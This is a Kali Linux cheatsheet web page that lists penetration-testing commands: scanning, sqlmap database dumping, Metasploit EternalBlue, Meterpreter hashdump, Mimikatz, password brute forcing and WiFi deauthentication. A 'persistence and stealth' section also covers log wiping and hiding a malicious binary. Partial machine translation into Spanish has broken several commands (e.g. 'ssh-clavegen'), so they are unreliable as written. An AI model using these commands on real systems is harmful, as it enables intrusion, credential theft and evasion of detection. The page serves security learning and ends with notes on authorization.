Kali Linux Cheatsheet

📋 Copy All Kali Linux comandos 📄 Generate Kali Linux PDF Guide

Kali Linux is a Debian-based Linux distribution specifically designed for forense digital and pruebas de penetración. Developed and maintained by Offensive Security, Kali Linux comes pre-installed with over 600 pruebas de penetración tools, making it the go-to platform for cybersecurity professionals, ethical hackers, and security researchers worldwide.

instalación and Setup

Download and instalación

# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso

# Verify suma de verificación
sha256sum kali-linux-2024.1-installer-amd64.iso

# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress

# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager

Virtual Machine Setup

# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged

# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization

Initial configuración

# Update system
sudo apt update && sudo apt upgrade -y

# Install additional tools
sudo apt install -y kali-linux-large

# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash nombre de usuario
sudo usermod -aG sudo nombre de usuario
sudo passwd nombre de usuario

# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh

# Configure firewall
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing

Essential Tools and comandos

Information Gathering

# Nmap - escaneo de red
nmap -sS -sV -O objetivo_ip
nmap -sC -sV -oA scan_results objetivo_ip
nmap --script vuln objetivo_ip

# Masscan - Fast puerto scanner
masscan -p1-65535 objetivo_ip --rate=1000

# Dmitry - Information gathering
dmitry -winsepo output.txt objetivo.com

# theHarvester - Email and subdomain gathering
theHarvester -d objetivo.com -l 500 -b google

# Recon-ng - Web reconocimiento framework
recon-ng
[recon-ng][default] > workspaces create objetivo_workspace
[recon-ng][objetivo_workspace] > modules load recon/domains-hosts/google_site_web

vulnerabilidad Assessment

# OpenVAS - vulnerabilidad scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update

# Nikto - Web vulnerabilidad scanner
nikto -h http://objetivo.com
nikto -h http://objetivo.com -o nikto_results.txt

# Dirb - Directory fuerza brutar
dirb http://objetivo.com
dirb http://objetivo.com /usr/share/dirb/wordlists/big.txt

# Gobuster - Directory/file fuerza brutar
gobuster dir -u http://objetivo.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d objetivo.com -w /usr/share/wordlists/dnsmap.txt

# WPScan - WordPress vulnerabilidad scanner
wpscan --url http://objetivo.com --enumerate u,p,t
wpscan --url http://objetivo.com --contraseñas /usr/share/wordlists/rockyou.txt

aplicación web Testing

# Burp Suite - aplicación web security testing
burpsuite &

# OWASP ZAP - aplicación web scanner
zaproxy &

# SQLmap - inyección SQL testing
sqlmap -u "http://objetivo.com/page.php?id=1" --dbs
sqlmap -u "http://objetivo.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://objetivo.com/page.php?id=1" -D database_name -T table_name --dump

# Commix - inyección de comandos testing
commix --url="http://objetivo.com/page.php?id=1"

# XSSer - cross-site scripting (XSS) testing
xsser --url "http://objetivo.com/search.php?q=XSS" --auto

exploitation

# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RhostS objetivo_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Searchsploit - exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py

# ingeniería social Toolkit
setoolkit
# Select from menu opcións for phishing, credential harvesting, etc.

# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel

Post-exploitation

# Meterpreter comandos (within Metasploit sesión)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\

# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client

# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logoncontraseñas
mimikatz # lsadump::sam

contraseña Attacks

# John the Ripper - cracking de contraseñas
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

# hashcat - Advanced contraseña recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://objetivo_ip
hydra -L users.txt -P contraseñas.txt ftp://objetivo_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt objetivo_ip http-post-form "/login.php:nombre de usuario=^USER^&contrase;ña=^PASS^:Invalid"

# Medusa - Parallel login fuerza brutar
medusa -h objetivo_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P contraseñas.txt -M ftp

# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt

Seguridad Inalámbrica

# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt

forense digital

# Autopsy - forense digital platform
autopsy &

# Volatility - Análisis de Memoria
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind

# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin

# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/

# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file

Ingeniería Inversa

# Ghidra - NSA Ingeniería Inversa tool
ghidra &

# Radare2 - Ingeniería Inversa framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main

# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers

# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file|grep -i contraseña

# Hexdump - Hex viewer
hexdump -C binary_file|head -20
xxd binary_file|head -20

Administración de Sistemas

Package Management

# Update package lists
sudo apt update

# Upgrade all packages
sudo apt upgrade -y

# Install specific tools
sudo apt install -y tool_name

# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10

# Search for packages
apt search claveword
apt show package_name

# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove

servicio Management

# Systemctl comandos
sudo systemctl start servicio_name
sudo systemctl stop servicio_name
sudo systemctl restart servicio_name
sudo systemctl enable servicio_name
sudo systemctl disable servicio_name
sudo systemctl status servicio_name

# Common servicios
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql

# Check listening puertos
netstat -tlnp
ss -tlnp

Network configuración

# Interface configuración
ip addr show
ip link set eth0 up
ip link set eth0 down

# Static IP configuración
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1

# DNS configuración
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4

# Restart networking
sudo systemctl restart networking

User Management

# Add user
sudo useradd -m -s /bin/bash nombre de usuario
sudo passwd nombre de usuario

# Add user to groups
sudo usermod -aG sudo nombre de usuario
sudo usermod -aG adm nombre de usuario

# Switch user
su - nombre de usuario
sudo -u nombre de usuario comando

# View user information
id nombre de usuario
groups nombre de usuario
finger nombre de usuario

# Lock/unlock user
sudo usermod -L nombre de usuario
sudo usermod -U nombre de usuario

Advanced Techniques

Custom Tool instalación

# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install

# Python tools
pip3 install tool_name
pip3 install -r requirements.txt

# Go tools
go install github.com/tool/repository@latest

# Ruby gems
gem install tool_name

# Manual instalación
wget https://ejemplo.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install

Environment Customization

# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'

# Custom functions
function extract() \\\\{
    if [ -f $1 ] ; then
        case $1 in
            *.tar.bz2)   tar xjf $1     ;;
            *.tar.gz)    tar xzf $1     ;;
            *.bz2)       bunzip2 $1     ;;
            *.rar)       unrar e $1     ;;
            *.gz)        gunzip $1      ;;
            *.tar)       tar xf $1      ;;
            *.tbz2)      tar xjf $1     ;;
            *.tgz)       tar xzf $1     ;;
            *.zip)       unzip $1       ;;
            *.Z)         uncompress $1  ;;
            *.7z)        7z x $1        ;;
            *)     echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
\\\\}

# Source the changes
source ~/.bashrc

Automation Scripts

# Basic reconocimiento script
#!/bin/bash
objetivo=$1
if [ -z "$objetivo" ]; then
    echo "uso: $0 <objetivo>"
    exit 1
fi

echo "Starting reconocimiento on $objetivo"
mkdir -p results/$objetivo

# Nmap scan
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA results/$objetivo/nmap_scan $objetivo

# Directory enumeración
echo "Running directory enumeración..."
gobuster dir -u http://$objetivo -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results/$objetivo/gobuster.txt

# Nikto scan
echo "Running Nikto scan..."
nikto -h http://$objetivo -o results/$objetivo/nikto.txt

echo "reconocimiento complete. Results saved in results/$objetivo/"

persistencia and Stealth

# SSH clave persistencia
ssh-clavegen -t rsa -b 4096
ssh-copy-id user@objetivo_ip

# Cron job persistencia
crontab -e
# Add: @reboot /path/to/script.sh

# servicio persistencia
sudo nano /etc/systemd/system/custom.servicio
# Create servicio file for persistencia

# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w

# proceso hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown

solución de problemas

Common Issues

# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop

# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm

# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start

# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager

Performance Optimization

# Disable unnecessary servicios
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-demonio

# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean

# Monitor resources
htop
iotop
nethogs
iftop

# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils

Security Best Practices

Operational Security

# Use VPN for testing
sudo openvpn config.ovpn

# Proxy chains configuración
sudo nano /etc/proxychains.conf
proxychains nmap objetivo_ip

# Tor uso
sudo systemctl start tor
proxychains firefox

# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0

# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/

Legal and Ethical Considerations

# Always obtain proper autorización
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws

# Create engagement documentación
echo "Penetration Test autorización" > autorización.txt
echo "Client: Company Name" >> autorización.txt
echo "Scope: IP ranges, domains" >> autorización.txt
echo "Date: $(date)" >> autorización.txt
echo "Tester: Your Name" >> autorización.txt

Resources

• Kali Linux Official documentación
• Offensive Security Training
• Kali Linux Tools
• pruebas de penetración Execution Standard
• OWASP Testing Guide